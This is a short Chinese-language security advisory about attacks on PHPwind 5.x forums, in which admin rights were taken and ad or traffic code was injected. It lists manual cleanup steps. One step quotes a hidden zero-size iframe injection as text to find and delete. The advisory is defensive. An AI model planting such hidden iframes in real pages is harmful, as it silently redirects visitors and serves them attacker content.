最近大量使用PHPwind论坛的网站都遭了殃,程度不一,有的数据完全丢失,有的网站跳转到其他位置.共有的特点就是,论坛管理权限给人夺取,网站给插入广告链接或流量代码.由于网络上传播了他人制作的攻击工具,所以给许多不懂安全的用户带来无限麻烦.
目前受影响的主要版本集中为:5.x.官方已提供解决方法,希望用户及时下载补丁程序.
手工清理步骤如下:
1.打补丁
2.下载修改密码工具修改管理员密码
3.修改管理员邮箱帐号
4.检查后台管理员帐号是否异常
5.检查后台插件是否有异常插件
6.检查核心CSS文件是否有恶意代码
7.修改databbscacheconfig.php 文件
找到<iframe src=http://xxx.htm width=0 height=0 frameborder=0></iframe>删除
8.重启apache 系统 或iis
9.清除 /template/wind/live.htm 清除 data/bbscache/admin_recors.php
安全中国首页 > 文章中心 > Phpwind文章